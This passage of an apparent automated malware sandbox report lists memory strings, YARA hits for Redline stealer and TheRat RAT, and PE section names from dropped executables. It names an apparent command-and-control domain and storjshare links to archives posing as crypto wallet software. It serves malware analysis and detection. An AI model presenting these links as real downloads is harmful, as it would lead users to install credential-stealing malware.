0000001D.00000003.2702690612.0000000005978000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2703013767.0000000005978000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
                    Source: powershell.exe, 0000000C.00000002.2256262756.000001D700228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: 0a7e8af92e.exe, 0000000B.00000002.2345610829.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmp, 0a7e8af92e.exe, 0000000B.00000000.2185582729.00007FF6BA38F000.00000002.00000001.01000000.0000000B.sdmpString found in binary or memory: https://github.com/dotnet/runtime
                    Source: b9ba85c997.exe, 0000001D.00000003.2791892110.00000000059CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqX1CqX4pbW1pbWfpbZ7ReNxR3UIG8zInwYIFIVs9eYi
                    Source: 68f6adf5d5.exe, 00000018.00000002.2602154875.0000017A8C7E0000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA37000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/
                    Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA5F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2564382416.0000017A8AA76000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/.5
                    Source: 68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000003.2564382416.0000017A8AAA7000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA37000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://ipinfo.io/json
                    Source: 68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://ipinfo.io/jsonN/Aipcountry
                    Source: 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8AA37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/jsonW)
                    Source: 68f6adf5d5.exe, 00000018.00000002.2602154875.0000017A8C7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io/l
                    Source: 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://link.storjshare.io/s/jvbdgt4oiad73vsmb56or2qtzcta/cardan-shafts/Exodus%20(Software)(1).zip?d
                    Source: 68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://link.storjshare.io/s/jvrb5lh3pynx3et56bisfuuguvoq/cardan-shafts/Electrum%20(Software)(1).zip
                    Source: 68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8A9C6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://link.storjshare.io/s/jvs5vlroulyshzqirwqzg7wys2wq/cardan-shafts/Atomic%20(Software)(2).zip?d
                    Source: 68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2600171036.0000017A8A9C6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://link.storjshare.io/s/jwkj6ktyi5kumzjvhrw6bdbvyceq/cardan-shafts/Ledger%20(Software).zip?down
                    Source: 68f6adf5d5.exe, 00000018.00000000.2410677294.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000018.00000002.2603643125.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmp, 68f6adf5d5.exe, 00000019.00000000.2426387393.00007FF7A4F90000.00000002.00000001.01000000.00000013.sdmpString found in binary or memory: https://link.storjshare.io/s/jx3obcnqgxa2u364c52wel6vrxba/cardan-shafts/Trazor%20(Software).zip?down
                    Source: powershell.exe, 0000000C.00000002.2281439263.000001D71006B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: 7620ab885d.exe, 7620ab885d.exe, 00000009.00000003.2061994993.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2206110625.0000000000BFC000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2175548971.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2153831037.0000000000BFB000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000002.2467998467.0000000000C0A000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367952280.0000000000BFE000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2122393292.00000000057BC000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000002.2467266806.0000000000B83000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2154380185.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2119364800.00000000057BC000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2122141118.00000000057BC000.00000004.00000800.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2174947020.0000000000BFF000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2367306642.0000000000BF9000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2368097027.0000000000C09000.00000004.00000020.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2735051897.00000000059BD000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2736107214.00000000059BD000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2817859860.00000000059BD000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2736540178.00000000059BD000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2757982140.00000000059BD000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2734432486.00000000059B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/
                    Source: b9ba85c997.exe, 0000001D.00000003.2817859860.00000000059BD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/(
                    Source: b9ba85c997.exe, 0000001D.00000003.2873027486.00000000014C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/6
                    Source: 7620ab885d.exe, 00000009.00000003.2206110625.0000000000BFC000.00000004.00000020.00020000.00000000.sdmp, 7620ab885d.exe, 00000009.00000003.2174947020.0000000000BFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://observerfry.lat/TIq
                    Source: 68f6adf5d5.exe, 00000019.00000003.2473325850.0000020F23D13000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2475302182.0000020F23D16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2473474944.0000020F23D14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyEACB672Dlay
                    Source: 68f6adf5d5.exe, 00000019.00000003.2468496006.0000020F23CF6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469708354.0000020F23CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore.readonlyY
                    Source: 68f6adf5d5.exe, 00000019.00000003.2473325850.0000020F23D13000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2475302182.0000020F23D16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2473474944.0000020F23D14000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472599693.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore1B3F6Z
                    Source: 68f6adf5d5.exe, 00000018.00000003.2433787726.0000017A8AA02000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2433428751.0000017A8AA02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore2nit
                    Source: 68f6adf5d5.exe, 00000019.00000003.2468496006.0000020F23CF6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469708354.0000020F23CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore3
                    Source: 68f6adf5d5.exe, 00000019.00000003.2473141212.0000020F23CD6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstore6J
                    Source: 68f6adf5d5.exe, 00000018.00000003.2442031009.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442121158.0000017A8AA52000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2436896441.0000017A8AA46000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442075697.0000017A8AA4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstoreBF47UB
                    Source: 68f6adf5d5.exe, 00000018.00000003.2436593145.0000017A8AA38000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2436896441.0000017A8AA46000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstorej
                    Source: 68f6adf5d5.exe, 00000019.00000003.2468614920.0000020F23CE2000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2468680946.0000020F23CE8000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2468814696.0000020F23CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstoreo
                    Source: 68f6adf5d5.exe, 00000018.00000003.2442031009.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442121158.0000017A8AA4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/chromewebstorev
                    Source: 68f6adf5d5.exe, 00000019.00000003.2472161851.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2471751370.0000020F23D02000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472599693.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierr
                    Source: 68f6adf5d5.exe, 00000019.00000003.2468814696.0000020F23CEA000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469439902.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra
                    Source: 68f6adf5d5.exe, 00000018.00000003.2436593145.0000017A8AA38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra2
                    Source: 68f6adf5d5.exe, 00000019.00000003.2468496006.0000020F23CF6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469708354.0000020F23CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra324091433FB53
                    Source: 68f6adf5d5.exe, 00000019.00000003.2470963577.0000020F23CEF000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2470055459.0000020F23CEF000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469202374.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469570975.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469439902.0000020F23CEB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra6_0
                    Source: 68f6adf5d5.exe, 00000019.00000003.2473325850.0000020F23D13000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2475302182.0000020F23D16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2473474944.0000020F23D14000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472599693.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierra734160BFD702D
                    Source: 68f6adf5d5.exe, 00000019.00000003.2473141212.0000020F23CD6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierraFJ
                    Source: 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrafJU#$
                    Source: 68f6adf5d5.exe, 00000019.00000003.2474688973.0000020F23CD7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox
                    Source: 68f6adf5d5.exe, 00000018.00000003.2442031009.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442121158.0000017A8AA52000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2438660177.0000017A8AA47000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2436896441.0000017A8AA46000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2442075697.0000017A8AA4E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox33FB53mB
                    Source: 68f6adf5d5.exe, 00000019.00000003.2473325850.0000020F23D13000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2475302182.0000020F23D16000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2473474944.0000020F23D14000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472599693.0000020F23D0F000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23D02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandbox36CB7E
                    Source: 68f6adf5d5.exe, 00000018.00000003.2433787726.0000017A8AA02000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000018.00000003.2433428751.0000017A8AA02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandboxD500
                    Source: 68f6adf5d5.exe, 00000019.00000003.2468496006.0000020F23CF6000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2469708354.0000020F23CFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandboxF75F3F
                    Source: 68f6adf5d5.exe, 00000019.00000003.2468614920.0000020F23CE2000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2468680946.0000020F23CE8000.00000004.00000020.00020000.00000000.sdmp, 68f6adf5d5.exe, 00000019.00000003.2468814696.0000020F23CEA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandboxK
                    Source: 68f6adf5d5.exe, 00000019.00000003.2472250876.0000020F23CD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/sierrasandboxVJ
                    Source: 7620ab885d.exe, 00000009.00000003.2124109168.00000000057C4000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2214822291.0000000005AE5000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2215025395.0000000005AE6000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642352150.0000000005560000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2642705937.0000000005561000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2791892110.00000000059CB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
                    Source: 7620ab885d.exe, 00000009.00000003.2123559065.000000000584A000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2192445390.0000000005B6A000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2640419965.0000000005573000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2780516155.000000000594C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
                    Source: b9ba85c997.exe, 0000001D.00000003.2786175481.0000000005A5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
                    Source: b9ba85c997.exe, 0000001D.00000003.2786175481.0000000005A5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
                    Source: b9ba85c997.exe, 0000001D.00000003.2786175481.0000000005A5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: 7620ab885d.exe, 00000009.00000003.2123694982.0000000005A6D000.00000004.00000800.00020000.00000000.sdmp, 8469cb4d4d.exe, 0000000A.00000003.2192628748.0000000005D86000.00000004.00000800.00020000.00000000.sdmp, b285303eae.exe, 0000001B.00000003.2640971301.00000000055F4000.00000004.00000800.00020000.00000000.sdmp, b9ba85c997.exe, 0000001D.00000003.2786175481.0000000005A5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: firefox.exe, 00000030.00000002.2974700144.00000195C2FF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd

                    System Summary

                    Source: 11.2.0a7e8af92e.exe.1c1310fe590.3.unpack, type: UNPACKEDPE | Matched rule: Finds Redline samples based on characteristic strings | Author: Sekoia.io
                    Source: 11.2.0a7e8af92e.exe.1c1310d6568.2.unpack, type: UNPACKEDPE | Matched rule: Finds Redline samples based on characteristic strings | Author: Sekoia.io
                    Source: 11.2.0a7e8af92e.exe.1c1310fe590.3.raw.unpack, type: UNPACKEDPE | Matched rule: Finds Redline samples based on characteristic strings | Author: Sekoia.io
                    Source: 11.2.0a7e8af92e.exe.1c1310d6568.2.raw.unpack, type: UNPACKEDPE | Matched rule: Finds Redline samples based on characteristic strings | Author: Sekoia.io
                    Source: 11.2.0a7e8af92e.exe.1c13114e5a8.1.raw.unpack, type: UNPACKEDPE | Matched rule: Finds Redline samples based on characteristic strings | Author: Sekoia.io
                    Source: 11.2.0a7e8af92e.exe.1c13114e5a8.1.unpack, type: UNPACKEDPE | Matched rule: Finds Redline samples based on characteristic strings | Author: Sekoia.io
                    Source: 16.0.DJj.exe.1b0000.0.unpack, type: UNPACKEDPE | Matched rule: Finds Redline samples based on characteristic strings | Author: Sekoia.io
                    Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, type: DROPPED | Matched rule: Detects images embedding archives. Observed in TheRat RAT. | Author: ditekSHen
                    Source: C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f, type: DROPPED | Matched rule: Detects images embedding archives. Observed in TheRat RAT. | Author: ditekSHen
                    Source: C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe, type: DROPPED | Matched rule: Finds Redline samples based on characteristic strings | Author: Sekoia.io
                    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\output[1].png, type: DROPPED | Matched rule: Detects images embedding archives. Observed in TheRat RAT. | Author: ditekSHen
                    Source: fb584dabd7.exe, 00000020.00000000.2839375451.0000000001002000.00000002.00000001.01000000.00000019.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_a79d3c74-0
                    Source: fb584dabd7.exe, 00000020.00000000.2839375451.0000000001002000.00000002.00000001.01000000.00000019.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_1d830436-8
                    Source: cMTqzvmx9u.exe | Static PE information: section name:
                    Source: cMTqzvmx9u.exe | Static PE information: section name: .idata
                    Source: skotes.exe.0.dr | Static PE information: section name:
                    Source: skotes.exe.0.dr | Static PE information: section name: .idata
                    Source: 7620ab885d.exe.5.dr | Static PE information: section name:
                    Source: 7620ab885d.exe.5.dr | Static PE information: section name: .rsrc
                    Source: 7620ab885d.exe.5.dr | Static PE information: section name: .idata
                    Source: random[3].exe.5.dr | Static PE information: section name:
                    Source: random[3].exe.5.dr | Static PE information: section name: .idata
                    Source: random[3].exe.5.dr | Static PE information: section name:
                    Source: random[1].exe.5.dr | Static PE information: section name:
                    Source: random[1].exe.5.dr | Static PE information: section name: .idata
                    Source: random[1].exe.5.dr | Static PE information: section name:
                    Source: 8469cb4d4d.exe.5.dr | Static PE information: section name:
                    Source: 8469cb4d4d.exe.5.dr | Static PE information: section name: .idata
                    Source: 8469cb4d4d.exe.5.dr | Static PE information: section name:
                    Source: random[1].exe0.5.dr | Static PE information: section name:
                    Source: random[1].exe0.5.dr | Static PE information: section name:
                    Source: random[1].exe0.5.dr | Static PE information: section name:
                    Source: random[1].exe0.5.dr | Static PE information: section name:
                    Source: random[1].exe0.5.dr | Static PE information: section name:
                    Source: random[1].exe0.5.dr | Static PE information: section name:
                    Source: random[1].exe0.5.dr | Static PE information: section name:
                    Source: random[1].exe0.5.dr | Static PE information: section name:
                    Source: 0a7e8af92e.exe.5.dr | Static PE information: section name:
                    Source: 0a7e8af92e.exe.5.dr | Static PE information: section name:
                    Source: 0a7e8af92e.exe.5.dr | Static PE information: section name:
                    Source: 0a7e8af92e.exe.5.dr | Static PE information: section name:
                    Source: 0a7e8af92e.exe.5.dr | Static PE information: section name:
                    Source: 0a7e8af92e.exe.5.dr | Static PE information: section name:
                    Source: 0a7e8af92e.exe.5.dr | Static PE information: section name:
                    Source: 0a7e8af92e.exe.5.dr | Static PE information: section name:
                    Source: random[1].exe1.5.dr | Static PE information: section name:
                    Source: random[1].exe1.5.dr | Static PE information: section name: .rsrc
                    Source: random[1].exe1.5.dr | Static PE information: section name: .idata
                    Source: random[1].exe2.5.dr | Static PE information: section name:
                    Source: random[1].exe2.5.dr | Static PE information: section name: .idata
                    Source: random[1].exe2.5.dr | Static PE information: section name:
                    Source: b285303eae.exe.5.dr | Static PE information: section name:
                    Source: b285303eae.exe.5.dr | Static PE information: section name: .idata
                    Source: b285303eae.exe.5.dr | Static PE information: section name:
                    Source: random[3].exe0.5.dr | Static PE information: section name:
                    Source: random[3].exe0.5.dr | Static PE information: section name: .idata
                    Source: random[3].exe0.5.dr | Static PE information: section name:
                    Source: b9ba85c997.exe.5.dr | Static PE information: section name:
                    Source: b9ba85c997.exe.5.dr | Static PE information: section name: .idata
                    Source: b9ba85c997.exe.5.dr | Static PE information: section name:
                    Source: random[2].exe2.5.dr | Static PE information: section name:
                    Source: random[2].exe2.5.dr | Static PE information: section name: .idata
                    Source: e6e4c20fad.exe.5.dr | Static PE information: section name:
                    Source: e6e4c20fad.exe.5.dr | Static PE information: section name: .idata
                    Source: f53b3c5fe2.exe.5.dr | Static PE information: section name:
                    Source: f53b3c5fe2.exe.5.dr | Static PE information: section name: .idata
                    Source: f53b3c5fe2.exe.5.dr | Static PE information: section name:
                    Source: random[3].exe2.5.dr | Static PE information: section name:
                    Source: random[3].exe2.5.dr | Static PE information: section name: .idata
                    Source: 96e283ac77.exe.5.dr | Static PE information: section name:
                    Source: 96e283ac77.exe.5.dr | Static PE information: section name: .idata
                    Source: 6b06c8a266.exe.5.dr | Static PE information: section name:
                    Source: 6b06c8a266.exe.5.dr | Static PE information: section name: .idata
                    Source: 6b06c8a266.exe.5.dr | Static PE information: section name:
                    Source: random[4].exe0.5.dr | Static PE information: section name:
                    Source: random[4].exe0.5.dr | Static PE information: section name: .idata
                    Source: random[4].exe0.5.dr | Static PE information: section name:
